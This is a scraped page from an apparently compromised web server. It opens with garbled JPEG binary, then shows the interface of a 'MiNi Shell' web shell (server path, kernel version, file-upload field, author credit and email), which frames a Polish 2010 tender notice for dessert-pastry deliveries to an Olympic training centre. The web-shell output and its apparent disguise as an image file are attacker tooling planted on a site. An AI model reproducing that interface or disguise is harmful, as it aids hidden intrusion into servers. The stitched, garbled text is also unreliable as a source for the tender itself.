JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100924/263057-N-2010.html

<p class="kh_header"><b>Władysławowo: Dostawy ciast deserowych do Ośrodka Przygotowań Olimpijskich we Władysławowie - część II</b><br>
<b>Numer ogłoszenia: 263057 - 2010; data zamieszczenia: 24.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie , ul. Żeromskiego 52, 84-120 Władysławowo, woj. pomorskie, tel. 058 6746314, faks 058 6746350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cetniewo.cos.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład budżetowy Ministerstwa Sportu i Turystyki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy ciast deserowych do Ośrodka Przygotowań Olimpijskich we Władysławowie - część II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Drożdżówka -ciastko o okrągłym, kopulastym kształcie, wykończone pomadą,  do wyboru z kruszonką, serem, makiem, kokosem, dżemem, budyniem, dwusmakowe, o wadze minimum 100 g	szt	1500
2.	Pączki - ciastko o kształcie owalnym, wykończone pomadą, nadziewane dżemem lub adwokadem,  o wadze minimum 90 g	szt	1200
3.	Rogaliki drożdżowe - ciastka o kształcie nadanym przez ręćzne zwijanie, wykończone pomadą, nadziewane dżemem, o wadze minimum 100 g	szt	1000
4.	Jagodzianki - ciastka drożdżowe, wykończone pomadą, z  nadzieniem  jagodowym , o wadze minimum 100 g	szt	1300
5.	Ciastko francuskie - o kształcie kwadratowym, grzebienia lub kopertywykończone pomadą lub cukrem, do wyboru z serem,dżemem, jabłkiem,  o wadze minimum  90 g	szt	1000
6.	Ciastka drożdżowe-małe ciasteczka na bazie ciasta drożdżowego z nadzieniem serowym lub marmoladą, wykończone kruszonką i posypane cukrem pudrem	kg	200
7.	Paszteciki z ciasta drożdżowego z nadzieniem pieczarkowym, z dodatkiem przypraw smakowych,  o wadze  minimum 60 g	szt	2000
8.	Jabłecznik  - o kształcie prostokątnym,  ciasto kruche, przekładane jabłkami prażonymi, wykończone pomadą, o wysokości mininum 4 cm, 	kg	100
9	Orzechowe  - ciasto kruche, przekładane powidłami i orzechami włoskimi , wykończone polewą czekoladową , o wysokości minimum 4 cm, 	kg	50
10	Ciasto mazurek-ciasto o spodzie kruchym,przekładane marmoladą ,z bakaliami,wykończone ciastem kruchym i dekoracją,o wyskości minimum 2 cm	kg	30
11	W/Z śmietanowa - ciasto biszkoptowo-kakaowe  przekładane bitą śmietaną , o wysokości minimum 6 cm 	kg	30
12	Pijak - ciasto na bazie biszkoptu, przekładany plackiem makowo kokosowym, masą budyniową i dżemem, wykończone polewą czekoladową, o wysokości minimum 5 cm	kg	50
13	Ciasto karmelowa słodycz-ciasto na bazie biszkoptu z dodatkiem herbatników i krakersów,przekładane masą toffi,wykończone bitą śmietaną	kg	100
14	Ciasto owocowe z galaretką - na bazie biszkoptu, z  bitą śmietaną, z owocami i galaretką owocową , o wysokości minimum 5 cm	kg	200
15	Sernik z brzoskwiną - na bazie kruchego spodu, z  masą serową  z brzoskwiniami, wykończone ubitym białkiem, o wysokości minimum 5 cm	kg	100
16	Sernik wiedeński na bazie kruchego spodu, z  masą  serową z dodatkiem rodzynek i skórką pomarańczową,   wykończone polewą czekoladową, o wysokości minimum 4 cm	kg	100
17	Sernik królewski na bazie kruchego spodu, z  masą  serową z dodatkiem rodzynek i skórką pomarańczową, wykończone  tartym  kruchym ciastem z kakao, o wysokości minimum 5 cm	kg	100
18	Ciasto mleczna kraina-ciasto deserowe na spodach biszkoptowych przełożonych warstwą mlecznej masy i galaretką pomarańczową,wykończone białą czekoladą, o wysokości minimum 5 cm - 	kg	100
19	Ambasador  - ciasto biszkoptowe , z masą  kremową i bakaliami , na  wykoćzone galaretką owocową z owocami , o wysokości minimum 5 cm	kg	50
20	Ciasto wiśniowa uczta -ciasto na spodzie o smaku orzechowym, z warstwą masy serowej, wykończone wiśniami zalanymi galaretką - o wysokości minimum 6 cm 	kg	150
21	Rolada tortowa - zwijane ciasto biszkoptowe, przełozone kremami o różnym smaku owocowym lub orzechowym, o średnicy minimum 5,5 cm i długości minimum 50 cm, 	kg	100
22	Torty  - ciasta deserowe , biszkoptowe lub bezowe, przekładane masą maślaną  o różnych smakach, wykończone elementami dekoracyjnymi, o kształcie okrągłym lub prostokątnym, o wysokości i wadze wzgodnionej z zamawiającym, zależnej od smaku i średnicy / 	kg	150
23	Pychotka  ciasto kruche z zapiekanym białkiem i orzechami włoskimi,  przekładane dżemem, kremem,o wysokości minimum 5 cm, 	kg	100
24	Keks - ciasto biszkoptowo tłuszczowe z dodatkiem  bakali, waga gotowego ciasta minimum  0,6 kg  ( przy wymiarach blachy 21,5x9,5 cm) W przypadku większej blachy waga proporcjonalnie wyższa. Wysokość ciasta minimum 9 cm	kg	200
25	Babki piaskowa,cytrynowa,kakao-babki biszkoptowo-tłuszczowe wypiekane w foremkach,babki piaskowe wykończone pomadą,cytrynowe wykończone pomadą i skórką cytrynową,babki z kakao polewą czekoladową.waga jednej babki minimum 400 gr	kg	200
26	Murzynek /- ciasto proszkowe kakaowe, wykończone polewą czekoladową , o wysokości minimum 5 cm	kg	100
27	Makowiec na bazie kruchego ciasta  z masą makową, o wysokości minimum 5 cm	kg	50
28	Małe pączki  drożdżowe , o kształcie owalnym z nadzieniem owocowym lub adwokatowym, wykończone pomadą, 	kg	200
29	Chruściki - ciasteczka smażone , posypane cukrem pudrem 	kg	200
30	Drożdżówka z kruszonka, wykończona pomadą, o wysokości minimum 4,5 cm 	kg	150
31	Drożdżówka z owocami - ciasto drożdżowe  do wyboru z jagodą lub śliwką, wykończone kruszonką i pomadą , o wysokości minimum 4,5 cm, 	kg	500
32	Drożdżówki mini - ciastka o kształcie okrągłym, kopulastym,   nadziewane dżemem, budyniem,  o  jednostkowej wadze  0,055 - 0,060 kg	szt	1000
33	Ciastko francuskie mini o kwadratowym kształcie, grzebienia lub koperty,  nadziewane dżemem lub musem jabłkowym,   o  jednostkowej wadze  0,055 - 0,060 kg	szt	1000
34	Omleciki małe - ciasteczka biszkoptowe przekładane budyniem i dżemem, posypane cukrem pudrem	kg	100
35	Babka wiedeńska maślana-babka biszkopotowo-tłuszczowa wypiekana w foremkach,wykończona cukrem pudrem-waga 1 szt minimum 300 gr	kg	100
36	ciasto sękacz-masa biszkoptowo-tłuszczowa,pieczona warstwami w korytkch - waga 1 szt minimum 1 kg	kg	50
37	Ciastka biszkopciki	kg	30
38	Rogaliki małe - z ciasta drożdżowego,  nadziewane dżemem/	kg	200.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3, 15.81.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu moga wziąć udział wykonawcy, któłrzy wykonali, a w przypadku świadczeń okresowych również wykonują w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamówienie dotyczące dostaw ciast deserowych o wartości brutto (na jedno zamówienie, umowę, kontrakt, w okresie maksymalnie 12 miesięcy) nie mniejszej niż 30 000 zł brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy załączyć próbki następujących produktów:
1.	Ciastka drożdżowe-małe ciasteczka na bazie ciasta drożdżowego z nadzieniem serowym lub marmoladą, wykończone kruszonką i posypane cukrem pudrem - wielkość próbki: 0,2 kg 
2.	Ciasto owocowe z galaretką - na bazie biszkoptu, z  bitą śmietaną, z owocami i galaretką owocową , o wysokości minimum 5 cm - wielkość próbki: 200 g
3.	Sernik królewski na bazie kruchego spodu, z  masą  serową z dodatkiem rodzynek i skórką pomarańczową, wykończone  tartym  kruchym ciastem z kakao, o wysokości minimum 5 cm - wielkość próbki: 200 g
4.	Ciasto mleczna kraina-ciasto deserowe na spodach biszkoptowych przełożonych warstwą mlecznej masy i galaretką pomarańczową, wykończone białą czekoladą, o wysokości minimum 5 cm - wielkość próbki: 200 g
5.	Ciasto wiśniowa uczta-ciasto na spodzie o smaku orzechowym, z warstwą masy serowej, wykończone wiśniami zalanymi galaretką - o wysokości minimum 6 cm - wielkość próbki: 200 g
6.	Babka wiedeńska maślana-babka biszkopotowo-tłuszczowa wypiekana w foremkach, wykończona cukrem pudrem-waga 1 szt minimum 300 g. - wielkość próbki 1 szt.
7.	Ciasto sękacz-masa biszkoptowo-tłuszczowa,pieczona warstwami w korytkach - waga 1 szt minimum 1 kg

Próbki winny być zapakowane w sposób dopuszczający kontakt opakowań z żywnością /folia, papier/, w kartonie z dopiskiem PRÓBKI WYROBÓW . Za złożone próbki wykonawca będzie mógł obciążyć Zamawiającego fakturą po cenach zawartych w ofercie - fakturę należy dołączyć do próbek lub oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość wyrobów - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wynagrodzenie nie podlega waloryzacji, za wyjątkiem zmiany ustawy o podatku od towarów i usług. W tym przypadku ceny jednostkowe brutto wzrosną o wielkość, o jaką wzrośnie stawka podatku
2.Jeżeli z upływem 12 miesięcy od dnia podpisania niniejszej umowy kwota określona w ust. 1 pozostanie nie zrealizowana, Strony mogą uzgodnić, w formie pisemnego aneksu, realizację niniejszej umowy do momentu osiągnięcia tej kwoty, nie dłużej jednak niż 4 lata od dnia podpisania umowy
3.	Strony zgodnie oświadczają, że ilość podana w formularzu cenowym (załącznik Nr 2 do Umowy) jest szacunkowa. Zamawiający zastrzega sobie prawo, w zależności od preferencji klientów Zamawiającego oraz możliwości Wykonawcy, do zmian: ilości (według zamówień częściowych). 
4.	W trakcie realizacji umowy może nastąpić zmiana produktu na równoważny w przypadku zaprzestania produkcji asortymentu wskazanego przez Wykonawcę w ofercie. Warunkiem dokonania zmiany jest przedstawienie przez Wykonawcę pisemnego oświadczenia (lub innego dokumentu) producenta o zaprzestaniu produkcji.
5.	W przypadku zmiany przez producenta wielkości opakowania, w jakim jest dostarczany dany produkt Wykonawca powinien powiadomić o tym fakcie Zamawiającego. Zapisy ust. 3 stosuje się odpowiednio.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cetniewo.cos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: 84-120 Władysłąwowo, ul. Żeromskiego 52.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2010 godzina 10:00, miejsce: Sekretariat Zamawiającego, 84-120 Władysłąwowo, ul. Żeromskiego 52.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com